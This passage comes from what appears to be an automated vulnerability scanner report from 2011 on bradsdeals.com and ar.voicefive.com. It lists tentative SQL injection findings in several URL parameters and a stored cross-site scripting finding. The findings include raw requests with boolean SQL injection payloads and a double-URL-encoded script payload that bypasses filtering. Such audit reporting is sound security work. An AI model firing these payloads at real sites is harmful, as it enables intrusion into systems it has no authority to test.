   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:51 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">812E-ADAC-F15B-DC88</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d2--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:52 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">78FC-DB12-C099-3AAB</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d2--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /res/opt/global.js

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /res/opt/global.js?v=2011082962280894%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:39 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">7BBF-BAD8-1227-0783</div>
</div>
   </body>
</html>

Request 2

GET /res/opt/global.js?v=2011082962280894%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Mon, 29 Aug 2011 21:05:22 GMT
Accept-Ranges: bytes
ETag: "095625d8f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:40 GMT
Content-Length: 192992

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009)
* Revision: 6246
*/
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.child
...[SNIP]...

1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /res/opt/screen.css

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /res/opt/screen.css?v=2011061619496541%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:33 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">5643-8923-23FA-8C9B</div>
</div>
   </body>
</html>

Request 2

GET /res/opt/screen.css?v=2011061619496541%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response 2

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 29 Aug 2011 21:05:43 GMT
Accept-Ranges: bytes
ETag: "80ede6698f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:34 GMT
Content-Length: 69864

body{color:#666;background:#fff;font:75%/140% Arial,Tahoma,Verdana,Helvetica,sans-serif;margin:0;padding:0;}table{border-spacing:0;border-collapse:collapse;}ul,ol{margin:.25em 0 1em 2em;padding-left:0;}li{margin-top:.25em;margin-bottom:.5em;}dt{font-weight:bold;margin:.5em 0 .12em 0;}dd{margin:.12em 0 .5em 0;}fieldset{margin:32px 0;padding:12px;border:1px solid #ccc;}legend{font-size:16px;color:#666;}button,input{font-size:100%;font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;}a{color:#3c85de;text-decoration:none;}a.hover,a:hover{text-decoration:underline;}a img{border:none;}h1,h2,.h2,h3,h4,h5,h6{font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;line-height:120%;margin:0;}h1{font-size:220%;margin:.25em 0 .75em;font-weight:normal;}h2,.h2{font-size:200%;margin:1em 0 .5em;font-weight:normal;}h3{font-size:135%;margin:0 0 .5em;font-weight:normal;}h4{font-size:100%;margin:0;}h5{font-size:90%;}h6{font-size:80%;}h1.divider,h2.divider,.h2.divider{border-bottom:1px solid #ddd;padding-bottom:.5em;height:1%;}p{margin-top:1em;margin-bottom:1em;}b,strong{font-weight:bold;}i,em{font-style:oblique;}blockquote{margin:1em 3em;}.hr hr{display:none;}.skipper{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.hide{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.error{color:#AF0000;}img{-ms-interpolation-mode:bicubic;}.cfx:after{content:".";display:block;height:0;clear:both;visibility:hidden;}.cfx:after{line-height:0;}.cfx{display:inline-block;}/* Hides from IE-mac \*/ * html .cfx{height:1%;}.cfx{display:block;}/* End hide from IE-mac */body{background:#f8faeb url("../images/bg_body_tile.jpg") top center repeat;}#pageBounds{background:transparent url("../images/bg_body_top.jpg") top center repeat-x;}body.iframe{background:#fff none;padding:10px 20px;}#content{width:948px;margin:0 auto;position:relative;}#mainColumn{float:left;padding:0 4px;width:580px;margin:0;position:relative;z-index:4;}#topRightColumn,#sideColumn{float:righ
...[SNIP]...

2. Cross-site scripting (stored)
There are 4 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /bmx3/broker.pli?pid=35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Request 2

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
